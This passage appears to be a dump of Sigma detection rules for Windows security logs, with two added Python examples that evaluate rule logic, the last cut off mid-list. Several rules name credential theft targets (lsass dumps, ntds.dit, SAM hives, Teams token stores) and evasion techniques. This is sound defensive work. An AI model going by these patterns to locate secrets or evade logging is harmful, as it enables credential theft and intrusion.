    "content": "title: Suspicious Teams Application Related ObjectAccess Event\nid: 25cde13e-8e20-4c29-b949-4e795b76f16f\nstatus: test\ndescription: Detects access to authentication tokens and accounts of the Microsoft Teams desktop application.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/\n    - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens\nauthor: '@SerkinValery'\ndate: 2022-09-16\ntags:\n    - attack.credential-access\n    - attack.t1528\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4663\n        ObjectName|contains:\n            - '\\Microsoft\\Teams\\Cookies'\n            - '\\Microsoft\\Teams\\Local Storage\\leveldb'\n    filter:\n        ProcessName|contains: '\\Microsoft\\Teams\\current\\Teams.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml",
    "content": "title: Transferring Files with Credential Data via Network Shares\nid: 910ab938-668b-401b-b08c-b596e80fdca5\nrelated:\n    - id: 2e69f167-47b5-4ae7-a390-47764529eff5\n      type: similar\nstatus: test\ndescription: Detects the transfer of files with well-known filenames (sensitive files with credential data) using network shares\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-10-22\nmodified: 2025-07-11\ntags:\n    - attack.credential-access\n    - attack.t1003.002\n    - attack.t1003.001\n    - attack.t1003.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID: 5145\n    selection_object:\n        - RelativeTargetName|contains:\n              - '\\mimidrv'\n              - '\\lsass'\n              - '\\windows\\minidump\\'\n              - '\\hiberfil'\n              - '\\sqldmpr'\n        - RelativeTargetName:\n              - 'Windows\\NTDS\\ntds.dit'\n              - 'Windows\\System32\\config\\SAM'\n              - 'Windows\\System32\\config\\SECURITY'\n              - 'Windows\\System32\\config\\SYSTEM'\n    condition: all of selection_*\nfalsepositives:\n    - Transferring sensitive files for legitimate administration work by a legitimate administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml",
    "content": "title: User Added to Local Administrator Group\nid: c265cf08-3f99-46c1-8d59-328247057d57\nstatus: stable\ndescription: Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity\nreferences:\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732\n    - https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-14\nmodified: 2021-01-17\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1078\n    - attack.persistence\n    - attack.t1098\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_eid:\n        EventID: 4732\n    selection_group:\n        - TargetUserName|startswith: 'Administr'\n        - TargetSid: 'S-1-5-32-544'\n    filter_main_computer_accounts:\n        SubjectUserName|endswith: '$'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Legitimate administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml",
    "content": "title: User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'\nid: 6daac7fc-77d1-449a-a71a-e6b4d59a0e54\nstatus: test\ndescription: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. A failure may indicate Rubeus trying to get a handle to LSA.\nreferences:\n    - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\nauthor: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community\ndate: 2019-10-24\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.lateral-movement\n    - attack.privilege-escalation\n    - attack.t1558.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4673\n        Service: 'LsaRegisterLogonProcess()'\n        Keywords: '0x8010000000000000'     # failure\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_creation.yml",
    "content": "title: Local User Creation\nid: 66b6be3d-55d0-4f47-9855-d69df21740ea\nstatus: test\ndescription: |\n    Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.\nreferences:\n    - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/\nauthor: Patrick Bareiss\ndate: 2019-04-18\nmodified: 2021-01-17\ntags:\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4720\n    condition: selection\nfalsepositives:\n    - Domain Controller Logs\n    - Local accounts managed by privileged account management tools\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_user_driver_loaded.yml",
    "content": "title: Potential Privileged System Service Operation - SeLoadDriverPrivilege\nid: f63508a0-c809-4435-b3be-ed819394d612\nstatus: test\ndescription: |\n    Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\n    With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode.\n    This user right does not apply to Plug and Play device drivers.\n    If you exclude privileged users/admins and processes that are allowed to do so, what remains may be malicious programs trying to load kernel drivers.\n    This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) as well as the usage of Sysinternals and various other tools, so you have to work with an allowlist to find the malicious activity.\nreferences:\n    - https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673\nauthor: xknow (@xknow_infosec), xorxes (@xor_xes)\ndate: 2019-04-08\nmodified: 2025-10-07\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection_1:\n        EventID: 4673\n        PrivilegeList: 'SeLoadDriverPrivilege'\n        Service: '-'\n    filter_main_exact:\n        ProcessName:\n            - 'C:\\Windows\\System32\\Dism.exe'\n            - 'C:\\Windows\\System32\\rundll32.exe'\n            - 'C:\\Windows\\System32\\fltMC.exe'\n            - 'C:\\Windows\\HelpPane.exe'\n            - 'C:\\Windows\\System32\\mmc.exe'\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\System32\\wimserv.exe'\n            - 'C:\\Windows\\System32\\RuntimeBroker.exe'\n            - 'C:\\Windows\\System32\\SystemSettingsBroker.exe'\n            - 'C:\\Windows\\explorer.exe'\n    filter_optional_others:\n        ProcessName|endswith:\n            - '\\procexp64.exe'\n            - '\\procexp.exe'\n            - '\\procmon64.exe'\n            - '\\procmon.exe'\n            - '\\Google\\Chrome\\Application\\chrome.exe'\n            - '\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe'\n    filter_main_startswith:\n        ProcessName|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft'\n    filter_optional_dropbox:\n        ProcessName|startswith:\n            - 'C:\\Program Files (x86)\\Dropbox\\'\n            - 'C:\\Program Files\\Dropbox\\'\n        ProcessName|endswith: '\\Dropbox.exe'\n    condition: selection_1 and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Other legitimate tools loading drivers, including but not limited to Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. It is also advisable to exclude users who are allowed to load drivers.\nlevel: medium\n"
  },
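The rule above relies on an allowlist of known driver-loading processes, and its falsepositives note recommends building a site-specific baseline of allowed tools and users on top of it. As an added example (not code from the Sigma project), the following Python evaluates the rule's `selection_1 and not 1 of filter_main_* and not 1 of filter_optional_*` logic against constructed 4673 events, then derives a per-user/process baseline from a reviewed learning window and reports only the hits that fall outside it. The field names follow the rule; the events, the tool paths and the user names are constructed for this demonstration.

```python
# Added example, not part of the Sigma project. Field names (EventID,
# PrivilegeList, Service, ProcessName, SubjectUserName) are taken from the rule;
# all events below are constructed.

FILTER_MAIN_EXACT = {
    "C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\rundll32.exe",
    "C:\\Windows\\System32\\fltMC.exe", "C:\\Windows\\HelpPane.exe",
    "C:\\Windows\\System32\\mmc.exe", "C:\\Windows\\System32\\svchost.exe",
    "C:\\Windows\\System32\\wimserv.exe", "C:\\Windows\\System32\\RuntimeBroker.exe",
    "C:\\Windows\\System32\\SystemSettingsBroker.exe", "C:\\Windows\\explorer.exe",
}
FILTER_MAIN_STARTSWITH = ("C:\\Program Files\\WindowsApps\\Microsoft",)
FILTER_OPTIONAL_ENDSWITH = (
    "\\procexp64.exe", "\\procexp.exe", "\\procmon64.exe", "\\procmon.exe",
    "\\Google\\Chrome\\Application\\chrome.exe",
    "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
)
DROPBOX_PREFIXES = ("C:\\Program Files (x86)\\Dropbox\\", "C:\\Program Files\\Dropbox\\")


def _lower(values):
    return tuple(v.lower() for v in values)


def rule_matches(ev):
    """selection_1 and not 1 of filter_main_* and not 1 of filter_optional_*.
    Sigma string comparisons are case-insensitive, hence the lower() calls."""
    if not (ev.get("EventID") == 4673
            and ev.get("PrivilegeList") == "SeLoadDriverPrivilege"
            and ev.get("Service") == "-"):
        return False
    p = ev.get("ProcessName", "").lower()
    if p in _lower(FILTER_MAIN_EXACT):
        return False                       # filter_main_exact
    if p.startswith(_lower(FILTER_MAIN_STARTSWITH)):
        return False                       # filter_main_startswith
    if p.endswith(_lower(FILTER_OPTIONAL_ENDSWITH)):
        return False                       # filter_optional_others
    if p.startswith(_lower(DROPBOX_PREFIXES)) and p.endswith("\\dropbox.exe"):
        return False                       # filter_optional_dropbox
    return True


def build_baseline(learning_events):
    """(user, process) pairs that fired the rule during a learning window and
    were reviewed as legitimate become the site-specific allowlist."""
    return {(e["SubjectUserName"].lower(), e["ProcessName"].lower())
            for e in learning_events if rule_matches(e)}


def triage(events, baseline):
    """Return the ProcessName of every rule hit not covered by the baseline."""
    return [e["ProcessName"] for e in events
            if rule_matches(e)
            and (e["SubjectUserName"].lower(), e["ProcessName"].lower()) not in baseline]


def _ev(process, user):
    return {"EventID": 4673, "PrivilegeList": "SeLoadDriverPrivilege",
            "Service": "-", "ProcessName": process, "SubjectUserName": user}


# Constructed learning window: one reviewed, legitimate driver-loading tool.
LEARNING = [_ev("C:\\Program Files\\CPUID\\CPU-Z\\cpuz.exe", "admin01")]

# Constructed events to triage.
EVENTS = [
    _ev("C:\\Windows\\System32\\svchost.exe", "WS01$"),              # filter_main_exact
    _ev("C:\\Tools\\procexp64.exe", "admin01"),                      # filter_optional_others
    _ev("C:\\Program Files\\CPUID\\CPU-Z\\cpuz.exe", "admin01"),     # baselined pair
    _ev("C:\\Program Files\\CPUID\\CPU-Z\\cpuz.exe", "bob"),         # known tool, unexpected user
    _ev("C:\\Users\\bob\\AppData\\Local\\Temp\\loader.exe", "bob"),  # unknown binary
]


def demo():
    return triage(EVENTS, build_baseline(LEARNING))


if __name__ == "__main__":
    for hit in demo():
        print("review:", hit)
```

Keying the baseline on the (user, process) pair rather than on the process alone is what turns the rule's static allowlist into the user-aware exclusion the falsepositives note asks for: a tool that is fine in an administrator's hands still surfaces when an unexpected account runs it.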
  {
    "path": "rules/windows/builtin/security/win_security_user_logoff.yml",
    "content": "title: User Logoff Event\nid: 0badd08f-c6a3-4630-90d3-6875cca440be\nstatus: test\ndescription: Detects a user log-off activity. Could be used for example to correlate information during forensic investigations\nreferences:\n    - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634\n    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647\nauthor: frack113\ndate: 2022-10-14\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    service: security\n    product: windows\ndetection:\n    selection:\n        EventID:\n            - 4634\n            - 4647\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml",
    "content": "title: VSSAudit Security Event Source Registration\nid: e9faba72-4974-4ab2-a4c5-46e25ad59e9b\nstatus: test\ndescription: Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-20\nmodified: 2022-04-28\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        AuditSourceName: VSSAudit\n        EventID:\n            - 4904\n            - 4905\n    condition: selection\nfalsepositives:\n    - Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe.\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml",
    "content": "title: Windows Defender Exclusion List Modified\nid: 46a68649-f218-4f86-aea1-16a759d81820\nrelated:\n    - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d\n      type: derived\n    - id: a33f8808-2812-4373-ae95-8cfb82134978\n      type: derived\nstatus: test\ndescription: |\n    Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nauthor: '@BarryShooshooga'\ndate: 2019-10-26\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'\ndetection:\n    selection:\n        EventID: 4657 # A registry value was modified.\n        ObjectName|contains: '\\Microsoft\\Windows Defender\\Exclusions\\'\n    condition: selection\nfalsepositives:\n    - Intended exclusions by administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_windows_defender_exclusions_write_access.yml",
    "content": "title: Windows Defender Exclusion Registry Key - Write Access Requested\nid: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d\nrelated:\n    - id: 46a68649-f218-4f86-aea1-16a759d81820\n      type: derived\n    - id: a33f8808-2812-4373-ae95-8cfb82134978\n      type: derived\nstatus: test\ndescription: |\n    Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/\nauthor: '@BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2019-10-26\nmodified: 2023-11-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User'\ndetection:\n    selection:\n        AccessList|contains:\n            - '%%4417' # WriteData\n            - '%%4418' # AppendData\n        EventID:\n            - 4656 # A handle to an object was requested.\n            - 4663 # An attempt was made to access an object.\n        ObjectName|contains: '\\Microsoft\\Windows Defender\\Exclusions\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_wmi_persistence.yml",
    "content": "title: WMI Persistence - Security\nid: f033f3f3-fd24-4995-97d8-a3bb17550a88\nrelated:\n    - id: 0b7889b4-5577-4521-a60a-3376ee7f9f7b\n      type: derived\nstatus: test\ndescription: Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.\nreferences:\n    - https://twitter.com/mattifestation/status/899646620148539397\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community\ndate: 2017-08-22\nmodified: 2022-11-29\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4662\n        ObjectType: 'WMI Namespace'\n        ObjectName|contains: 'subscription'\n    condition: selection\nfalsepositives:\n    - Unknown (data set is too small; further testing needed)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml",
    "content": "title: T1047 Wmiprvse Wbemcomn DLL Hijack\nid: f6c68d5f-e101-4b86-8c84-7d96851fd65c\nstatus: test\ndescription: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)\ndate: 2020-10-12\nmodified: 2022-02-24\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 5145\n        RelativeTargetName|endswith: '\\wbem\\wbemcomn.dll'\n    filter:\n        SubjectUserName|endswith: '$'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security/win_security_workstation_was_locked.yml",
    "content": "title: Locked Workstation\nid: 411742ad-89b0-49cb-a7b0-3971b5c1e0a4\nstatus: stable\ndescription: Detects locked workstation session events that occur automatically after a standard period of inactivity.\nreferences:\n    - https://www.cisecurity.org/controls/cis-controls-list/\n    - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf\n    - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf\n    - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800\nauthor: Alexandr Yampolskyi, SOC Prime\ndate: 2019-03-26\nmodified: 2023-12-11\ntags:\n    - attack.impact\n    # - CSC16\n    # - CSC16.11\n    # - ISO27002-2013 A.9.1.1\n    # - ISO27002-2013 A.9.2.1\n    # - ISO27002-2013 A.9.2.2\n    # - ISO27002-2013 A.9.2.3\n    # - ISO27002-2013 A.9.2.4\n    # - ISO27002-2013 A.9.2.5\n    # - ISO27002-2013 A.9.2.6\n    # - ISO27002-2013 A.9.3.1\n    # - ISO27002-2013 A.9.4.1\n    # - ISO27002-2013 A.9.4.3\n    # - ISO27002-2013 A.11.2.8\n    # - PCI DSS 3.1 7.1\n    # - PCI DSS 3.1 7.2\n    # - PCI DSS 3.1 7.3\n    # - PCI DSS 3.1 8.7\n    # - PCI DSS 3.1 8.8\n    # - NIST CSF 1.1 PR.AC-1\n    # - NIST CSF 1.1 PR.AC-4\n    # - NIST CSF 1.1 PR.AC-6\n    # - NIST CSF 1.1 PR.AC-7\n    # - NIST CSF 1.1 PR.PT-3\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4800\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: informational\n"
  },
  {
    "path": "rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml",
    "content": "title: Microsoft Defender Blocked from Loading Unsigned DLL\nid: 0b0ea3cc-99c8-4730-9c53-45deee2a4c86\nstatus: test\ndescription: Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL\nreferences:\n    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool\nauthor: Bhabesh Raj\ndate: 2022-08-02\nmodified: 2022-09-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: security-mitigations\ndetection:\n    selection:\n        EventID:\n            - 11\n            - 12 # MDE: ExploitGuardNonMicrosoftSignedBlocked\n        ProcessPath|endswith:\n            - '\\MpCmdRun.exe'\n            - '\\NisSrv.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml",
    "content": "title: Unsigned Binary Loaded From Suspicious Location\nid: 8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10\nstatus: test\ndescription: Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations\nreferences:\n    - https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-03\nmodified: 2022-09-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    service: security-mitigations\ndetection:\n    selection:\n        EventID:\n            - 11\n            - 12\n        ImageName|contains:\n            - '\\Users\\Public\\'\n            - '\\PerfLogs\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\AppData\\Local\\Temp\\'\n            - 'C:\\Windows\\TEMP\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml",
    "content": "title: HybridConnectionManager Service Running\nid: b55d23e5-6821-44ff-8a6e-67218891e49f\nstatus: test\ndescription: Rule to detect the Hybrid Connection Manager service running on an endpoint.\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2024-08-05\ntags:\n    - attack.persistence\n    - attack.t1554\nlogsource:\n    product: windows\n    service: microsoft-servicebus-client # Change to servicebus-client once validators are up to date\ndetection:\n    selection:\n        EventID:\n            - 40300\n            - 40301\n            - 40302\n    keywords:\n        - 'HybridConnection'\n        - 'sb://'\n        - 'servicebus.windows.net'\n        - 'HybridConnectionManage'\n    condition: selection and keywords\nfalsepositives:\n    - Legitimate use of Hybrid Connection Manager via Azure function apps.\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml",
    "content": "title: Suspicious Application Installed\nid: 83c161b6-ca67-4f33-8ad0-644a0737cf07\nstatus: test\ndescription: Detects suspicious application installed by looking at the added shortcut to the app resolver cache\nreferences:\n    - https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-14\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    service: shell-core\ndetection:\n    selection_name:\n        EventID: 28115\n        Name|contains:\n            # Please add more\n            - 'Zenmap'\n            - 'AnyDesk'\n            - 'wireshark'\n            - 'openvpn'\n    selection_packageid:\n        EventID: 28115\n        AppID|contains:\n            # Please add more\n            - 'zenmap.exe'\n            - 'prokzult ad' # AnyDesk\n            - 'wireshark'\n            - 'openvpn'\n    condition: 1 of selection_*\nfalsepositives:\n    - Packages or applications being legitimately used by users or administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml",
    "content": "title: Suspicious Rejected SMB Guest Logon From IP\nid: 71886b70-d7b4-4dbf-acce-87d2ca135262\nstatus: test\ndescription: Detects a rejected SMB guest logon attempt against a server referenced by IP address rather than hostname, as observed during PrintNightmare (CVE-2021-1675) remote code execution attempts against the Windows Print Spooler service.\nreferences:\n    - https://twitter.com/KevTheHermit/status/1410203844064301056\n    - https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/\n    - https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare\nauthor: Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w\ndate: 2021-06-30\nmodified: 2023-01-02\ntags:\n    - attack.credential-access\n    - attack.t1110.001\nlogsource:\n    product: windows\n    service: smbclient-security\ndetection:\n    selection:\n        EventID: 31017\n        UserName: ''\n        ServerName|startswith: '\\1'\n    condition: selection\nfalsepositives:\n    - Account fallback reasons (after failed login with specific account)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/smbserver/connectivity/win_smbserver_connectivity_unsigned_and_unencrypted_share_connection.yml",
    "content": "title: Unsigned or Unencrypted SMB Connection to Share Established\nid: 8d91f6e4-9f3b-4c21-ae41-2c5b7d9f7a12\nstatus: experimental\ndescription: |\n    Detects SMB server connections to shares without signing or encryption enabled.\n    This could indicate potential lateral movement activity using unsecured SMB shares.\nauthor: Mohamed Abdelghani\ndate: 2025-10-19\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    service: smbserver-connectivity\ndetection:\n    selection_shares:\n        EventID: 4000\n        ShareName|contains:\n            - 'IPC$'\n            - 'ADMIN$'\n            - 'C$'\n    selection_status:\n        - SigningUsed: 'false'\n        - EncyptionUsed: 'false' # Note: typo in the original event field name\n    filter_main_local_ips:\n        - ClientAddress|cidr:\n              # IPv4\n              # - '10.0.0.0/8'\n              - '127.0.0.0/8'\n              - '169.254.0.0/16'\n              # - '172.16.0.0/12'\n              # - '192.168.0.0/16'\n              # IPv6\n              - '::1/128'  # IPv6 loopback\n              - 'fe80::/10'  # IPv6 link-local addresses\n              - 'fc00::/7'  # IPv6 unique local addresses\n        # The filters below cover the XML raw log\n        - ClientAddress|contains:\n              # IPv6\n              - '00000000000000000000000000000001' # ::1 - IPv6 loopback\n              - 'FE80000000000000' # fe80:: - IPv6 link-local addresses\n              - 'FC00000000000000' # fc00:: - IPv6 unique local addresses\n              # IPv4\n              # The \"?\" characters stand for the two port bytes\n              # - '0200????C0A8' # 192.168.\n              # - '0200????AC' # 172.\n              # - '0200????0A' # 10.\n              - '0200????7F' # 127\n              - '0200????A9FE' # 169.254.\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Connections from local or private IP addresses to SMB shares without signing or encryption enabled for older systems or misconfigured environments. Apply additional tuning as needed.\nlevel: medium\n"
  },
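The rule above has to match the ClientAddress field in two encodings: the rendered IP string and, in the raw XML view of event 4000, a hex-encoded SOCKADDR blob where `0200` is the little-endian AF_INET family, the next two bytes are the port and the address follows. As an added example (not code from the Sigma project), the following Python decodes both forms into an `ipaddress` object and then applies the share, signing/encryption and local-address logic of the rule to constructed events. The byte layout (AF_INET as `0200`, AF_INET6 as `1700` followed by port and flowinfo before the 16-byte address) is an assumption taken from the rule's comments and the Windows `sockaddr_in`/`sockaddr_in6` structures; the field names follow the rule and the events are constructed.

```python
# Added example, not part of the Sigma project. SOCKADDR layout and the
# AF_INET (2) / AF_INET6 (23) family values are assumptions; events are constructed.
import ipaddress

# Exclusions from the rule's filter_main_local_ips; the commented-out RFC 1918
# ranges in the rule stay disabled here as well.
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]
SENSITIVE_SHARES = ("IPC$", "ADMIN$", "C$")
AF_INET, AF_INET6 = 2, 23


def decode_client_address(raw):
    """Return an ip_address for either a rendered address string or the raw
    SOCKADDR hex blob found in the XML view of the event."""
    try:
        return ipaddress.ip_address(raw)
    except ValueError:
        pass
    blob = bytes.fromhex(raw)
    family = int.from_bytes(blob[0:2], "little")   # sa_family, little-endian
    if family == AF_INET and len(blob) >= 8:
        return ipaddress.IPv4Address(blob[4:8])     # family(2) + port(2) + addr(4)
    if family == AF_INET6 and len(blob) >= 24:
        return ipaddress.IPv6Address(blob[8:24])    # family(2) + port(2) + flowinfo(4) + addr(16)
    raise ValueError("unrecognised ClientAddress encoding: %r" % raw)


def is_hit(ev):
    """all of selection_* and not 1 of filter_main_*."""
    if ev.get("EventID") != 4000:
        return False
    if not any(s in ev.get("ShareName", "") for s in SENSITIVE_SHARES):
        return False
    # selection_status is a list of maps in the rule, i.e. OR of the two fields
    if not (ev.get("SigningUsed") == "false" or ev.get("EncyptionUsed") == "false"):
        return False
    addr = decode_client_address(ev["ClientAddress"])
    return not any(addr in net for net in LOCAL_NETS)


# Raw sockaddr_in6 for fe80::1 port 445 (constructed).
IPV6_LINK_LOCAL_RAW = "1700" "01BD" "00000000" "FE80000000000000" "0000000000000001" "00000000"

SAMPLE_EVENTS = [  # constructed
    {"EventID": 4000, "ShareName": "\\\\*\\ADMIN$", "SigningUsed": "false",
     "EncyptionUsed": "false", "ClientAddress": "10.20.30.40"},           # hit
    {"EventID": 4000, "ShareName": "\\\\*\\C$", "SigningUsed": "true",
     "EncyptionUsed": "false",
     "ClientAddress": "020001BD0A141E2C0000000000000000"},                 # raw 10.20.30.44:445, hit
    {"EventID": 4000, "ShareName": "\\\\*\\IPC$", "SigningUsed": "false",
     "EncyptionUsed": "false",
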